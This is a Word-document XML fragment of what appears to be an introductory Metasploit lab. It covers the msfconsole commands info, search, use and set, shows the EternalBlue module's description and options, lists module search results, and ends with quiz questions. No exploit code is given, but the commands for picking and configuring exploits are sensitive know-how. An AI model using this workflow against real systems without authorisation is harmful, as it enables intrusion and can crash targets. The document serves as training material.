    <w:p w14:paraId="7815A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windows/x64/meterpreter/bind_ipv6_tcp_uuid                   manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C91F0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6EB7C97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If used from the msfconsole prompt, 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command will list all modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB90BE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and </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> commands we have seen so far are identical for all modules in Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2509D0B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leave the context using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0498E0BD"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back command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F2677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back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2978DC0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F076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1BEB35F0"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Further information on any module can be obtained by typing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command within its context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2980EAE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info command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C0EBB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info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711FF4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1F183E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MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DB0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Module: exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A1C2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Platform: Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF65D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Arch: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F419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Privileged: Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70032F1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License: Metasploit Framework License (BSD)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45336A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Rank: Average</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6093A5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Disclosed: 2017-03-14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B340C6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CDBF7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Provided by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35FF9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Sean Dillon </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489BC7E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Dylan Davis </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B51E1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Equation Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F450F3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Shadow Brokers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0765AC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thelightcosine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A191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B52F6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Available targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BCED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Id  Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F23C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1202F5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6A0A6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24AD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Check supported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160DBC4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Yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FCE37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AFD0E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Basic options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE2B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601D1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1ED758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4661C2B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yes       The target port (TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F774E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0F05C0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6AA9F3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14F188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1119B76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229DB4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717C5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information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F9DA1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Space: 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D30957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E40D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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EB302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This module is a port of the Equation Group ETERNALBLUE exploit, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A23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part of the FuzzBunch toolkit released by Shadow Brokers. There is a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5457174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buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C24C9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calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A476B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where a DWORD is subtracted into a WORD. The kernel pool is groomed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E708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 that overflow is well laid-out to overwrite an SMBv1 buffer. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A417CF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Actual RIP hijack is later completed in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D650AF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srvnet!SrvNetWskReceiveComplete. This exploit, like the original may </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6861A4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not trigger 100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of the time, and should be run continuously </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="0077AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>until</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="BAC8D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="282C33"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EA10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triggered. It seems like the pool will get hot streaks and need a </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2279346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cool down period before the shells rain in again. The module will </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD18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attempt to use Anonymous login, by default, to authenticate to </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F499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perform the exploit. If the user supplies credentials in the </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA68E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SMBPass, and SMBDomain options it will use those instead. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5D9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On some systems, this module may cause system instability and </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D383D6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crashes, such as a BSOD or a reboot. This may be more likely with </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4197AA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some payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728037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EDE3C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References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30470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https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085843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https://cvedetails.com/cve/CVE-2017-0143/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2CE50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https://cvedetails.com/cve/CVE-2017-0144/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C0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https://cvedetails.com/cve/CVE-2017-0145/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B54A0E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https://cvedetails.com/cve/CVE-2017-0146/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD09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https://cvedetails.com/cve/CVE-2017-0147/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FD5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https://cvedetails.com/cve/CVE-2017-0148/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F4B4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https://github.com/RiskSense-Ops/MS17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB5A3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58A6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Also known as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F609C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ETERNALBLUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E1F12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C77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exploit(windows/smb/ms17_010_eternalblue) &gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519EFA9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AFF815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Alternatively, you can use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command followed by the module’s path from the msfconsole prompt (e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>info exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>). Info is not a help menu; it will display detailed information on the module such as its author, relevant sources, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1711B954"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b/>
          <w:bCs/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF9360"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lastRenderedPageBreak/>
        <w:t>One of the most useful commands in msfconsole is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This command will search the Metasploit Framework database for modules relevant to the given search parameter. You can conduct searches using CVE numbers, exploit names (eternalblue, heartbleed, etc.), or target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C584C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search command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64834A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search ms17-010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD05DC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AAE24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6DB88E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C43494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C5E8CD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724E1D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39DAFB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auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21005A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auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D02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exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAFED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exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5148477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exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEA5E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49450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3E9F2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4 or use exploit/windows/smb/smb_doublepulsar_rce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210C448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AEA9D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DB5938A"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9E9DC1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The output of the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xml:space="preserve"> command provides an overview of each returned module. You may notice the “name” column already gives more information than just the module name. You can see the type of module (auxiliary, exploit, etc.) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>category of the module (scanner, admin, windows, Unix, etc.). You can use any module returned in a search result with the command use followed by the number at the beginning of the result line. (e.g. </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use 0</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> instead of </w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use auxiliary/admin/smb/ms17_010_command</w:t>
      </w:r>
      <w:r w:rsidRPr="00146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD38B9"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t>Another essential piece of information returned is in the “rank” column. Exploits are rated based on their reliability. The table below provides their respective descriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65C714" w14:textId="43488E80"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noProof/>
          <w:color w:val="0E101A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C580283" wp14:editId="1B1D04A9">
            <wp:extent cx="5943600" cy="2942590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11752942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94237" name="Picture 1"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5E933B1B"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Source: </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00146E29">
          <w:rPr>
            <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
            <w:color w:val="4A6EE0"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://github.com/rapid7/metasploit-framework/wiki/Exploit-Ranking</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="514F69C7"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6E99D18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You can direct the search function using keywords such as type and platform.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07366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15BDEC1A"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For example, if we wanted our search results to only include auxiliary modules, we could set the type to auxiliary. The screenshot below shows the output of the search type:auxiliary telnet command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217522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43B75831"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Search by module type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBF28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search type:auxiliary telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76ACB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CC76C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0CF617D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7FCB77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5174AD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399DEDB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                                                ---------------  ----    -----  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB4A1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auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal  No     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9A06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auxiliary/admin/http/netgear_r6700_pass_reset       2020-06-15       normal  Yes    Netgear R6700v3 Unauthenticated LAN Admin Password Reset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FA89B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auxiliary/dos/cisco/ios_telnet_rocem                2017-03-17       normal  No     Cisco IOS Telnet Denial of Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27823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auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal  No     Microsoft IIS FTP Server Encoded Response Overflow Trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495411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auxiliary/scanner/ssh/juniper_backdoor              2015-12-20       normal  No     Juniper SSH Backdoor Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3929F83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auxiliary/scanner/telnet/brocade_enable_login                        normal  No     Brocade Enable Login Check Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A254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auxiliary/scanner/telnet/lantronix_telnet_password                   normal  No     Lantronix Telnet Password Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223605B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auxiliary/scanner/telnet/lantronix_telnet_version                    normal  No     Lantronix Telnet Service Banner Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D856C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8   auxiliary/scanner/telnet/satel_cmd_exec             2017-04-07       normal  No     Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5299DD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9   auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal  No     Telnet Service Encryption Key ID Overflow Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D67B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10  auxiliary/scanner/telnet/telnet_login                                normal  No     Telnet Login Check Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656D17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11  auxiliary/scanner/telnet/telnet_ruggedcom                            normal  No     RuggedCom Telnet Password Generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAF86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12  auxiliary/scanner/telnet/telnet_version                              normal  No     Telnet Service Banner Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D11B2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13  auxiliary/server/capture/telnet                                      normal  No     Authentication Capture: Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BE29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F93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DB7DF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13 or use auxiliary/server/capture/telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F638A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E7C9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039E3C9"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7E45E53"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Please remember that exploits take advantage of a vulnerability on the target system and may always show unexpected behavior. A low-ranking exploit may work perfectly, and an excellent ranked exploit may not, or worse, crash the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F037ADB" w14:textId="77777777" w:rsidR="00146E29" w:rsidRPr="00146E29" w:rsidRDefault="00146E29" w:rsidP="00146E29">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146E29">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Answer the questions below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538D0231"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How would you search for a module related to Apache?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399FB73" w14:textId="781C68E2"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57655306">
          <v:shape id="_x0000_i1063" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId15" o:title=""/>
          </v:shape>
          <w:control r:id="rId16" w:name="DefaultOcxName4" w:shapeid="_x0000_i1063"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="255048F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40BEB93"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Who provided the auxiliary/scanner/ssh/ssh_login module?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28591097" w14:textId="1DDB2368"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652EFBB2">
          <v:shape id="_x0000_i1067" type="#_x0000_t75" style="width:42pt;height:18pt" o:ole="">
            <v:imagedata r:id="rId17" o:title=""/>
          </v:shape>
          <w:control r:id="rId18" w:name="DefaultOcxName11" w:shapeid="_x0000_i1067"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDE2E71"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5A8B118" w14:textId="77777777" w:rsidR="00146E29" w:rsidRPr="00146E29" w:rsidRDefault="00146E29" w:rsidP="00146E29">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing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Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0945FB21" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">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BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Working with modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFD357" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="top"/>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Start Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B8CD8"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You can launch the target machine attached to this room to replicate the examples shown below. Any Metasploit version 5 or 6 will have menus and screens similar to those shown here so you can use the AttackBox or any operating system installed on your local computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F704F3"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Once you have entered the context of a module using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command followed by the module name, as seen earlier, you will need to set parameters. The most common parameters you will use are listed below. Remember, based on the module you use, additional or different parameters may need to be set. It is good practice to use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212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> command to list the required parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0485A6E3"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All parameters are set using the same command syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>set PARAMETER_NAME VALUE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16600651"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Before we proceed, remember always to check the msfconsole prompt to ensure you are in the right context. When dealing with Metasploit, you may see five different prompts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDF1F93" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">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The regular command prompt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> You can not use Metasploit commands here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB358D"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Regular command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD2327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root@ip-10-10-XX-XX:~#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E71409" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">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lastRenderedPageBreak/>
        <w:t>The msfconsole prompt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> msf6 (or msf5 depending on your installed version) is the msfconsole prompt. As you can see, no context is set here, so context-specific commands to set parameters and run modules can not be used here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F8936F"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Metasploit command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CCE0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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8F86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3E1E45AF" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">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A context prompt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Once you have decided to use a module and used the set command to chose it, the msfconsole will show the context. You can use context-specific commands (e.g. set RHOSTS 10.10.x.x) here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A64223E"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context command prompt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E826BE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4C736745"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024DABCB" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">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The Meterpreter prompt:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF61F8">
        <w:rPr>
          <w:rFonts w:ascii="Ubuntu" w:eastAsia="Times New Roman" w:hAnsi="Ubuntu" w:cs="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> Meterpreter is an important payload we will see in detail later in this module. This means a Meterpreter agent was loaded to the target system and connected back to you. You can use Meterpreter specific commands here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C44988"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1D45EED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meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE90920" w14:textId="77777777" w:rsidR="00BF61F8" w:rsidRPr="00BF61F8" w:rsidRDefault="00BF61F8" w:rsidP="00BF61F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
